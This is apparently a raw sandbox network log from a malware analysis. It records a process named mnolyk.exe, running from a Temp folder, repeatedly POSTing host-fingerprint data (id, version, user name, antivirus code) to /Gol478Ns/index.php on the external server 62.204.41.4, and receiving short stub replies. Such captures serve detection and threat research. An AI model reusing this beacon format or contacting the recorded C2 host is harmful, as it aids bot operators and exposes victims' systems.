Feb 7, 2023 19:59:58.049992085 CET	865	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:59:58 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
621	192.168.2.5	50334	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:59:58.221791029 CET	866	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:59:58.289617062 CET	866	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:59:58 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
622	192.168.2.5	50335	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:59:58.469496965 CET	867	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:59:58.533184052 CET	867	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:59:58 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
623	192.168.2.5	50336	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:59:58.703262091 CET	868	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:59:58.765752077 CET	868	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:59:58 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
624	192.168.2.5	50337	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:59:58.938843966 CET	869	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:59:59.003376007 CET	869	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:59:58 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
625	192.168.2.5	50338	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:59:59.187277079 CET	870	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:59:59.251653910 CET	870	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:59:59 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
626	192.168.2.5	50339	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:59:59.425941944 CET	871	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:59:59.488944054 CET	871	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:59:59 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
627	192.168.2.5	50340	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:59:59.670957088 CET	872	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:59:59.733455896 CET	872	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:59:59 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
628	192.168.2.5	50341	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:00:00.154877901 CET	873	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:00:00.219201088 CET	873	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:00:00 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
629	192.168.2.5	50342	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:00:00.462429047 CET	874	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:00:00.525985956 CET	874	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:00:00 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
63	192.168.2.5	49769	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:57:21.585123062 CET	254	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:57:21.650852919 CET	255	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:57:21 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
630	192.168.2.5	50343	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:00:00.779937983 CET	875	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:00:00.844572067 CET	875	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:00:00 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
631	192.168.2.5	50344	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:00:01.675170898 CET	876	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:00:01.741522074 CET	876	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:00:01 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
632	192.168.2.5	50345	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:00:01.959618092 CET	877	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:00:02.022805929 CET	877	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:00:01 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
633	192.168.2.5	50346	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:00:03.180455923 CET	878	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:00:03.246685982 CET	878	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:00:03 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
634	192.168.2.5	50347	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:00:03.721906900 CET	879	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:00:03.788212061 CET	879	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:00:03 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
635	192.168.2.5	50348	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:00:03.954544067 CET	880	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:00:04.017246008 CET	880	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:00:03 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
636	192.168.2.5	50349	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:00:04.188949108 CET	881	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:00:04.254842997 CET	881	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:00:04 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
637	192.168.2.5	50350	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:00:04.422898054 CET	882	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:00:04.488667965 CET	882	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:00:04 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
638	192.168.2.5	50351	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:00:04.658669949 CET	883	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:00:04.722706079 CET	883	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:00:04 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
639	192.168.2.5	50352	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:00:04.891222000 CET	884	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:00:04.954359055 CET	884	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:00:04 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
64	192.168.2.5	49770	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:57:21.824481964 CET	255	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:57:21.890430927 CET	256	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:57:21 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
640	192.168.2.5	50353	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
